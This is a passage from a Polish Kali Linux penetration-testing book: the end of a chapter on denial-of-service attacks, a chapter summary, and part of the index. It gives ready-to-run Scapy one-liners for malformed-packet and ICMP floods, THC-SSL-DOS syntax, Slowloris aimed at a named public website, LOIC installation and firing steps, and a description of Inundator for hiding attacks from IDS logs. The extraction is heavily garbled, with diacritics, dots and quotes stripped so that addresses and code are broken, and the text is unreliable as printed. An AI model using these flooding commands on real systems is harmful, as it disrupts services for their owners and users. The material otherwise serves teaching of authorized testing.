Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

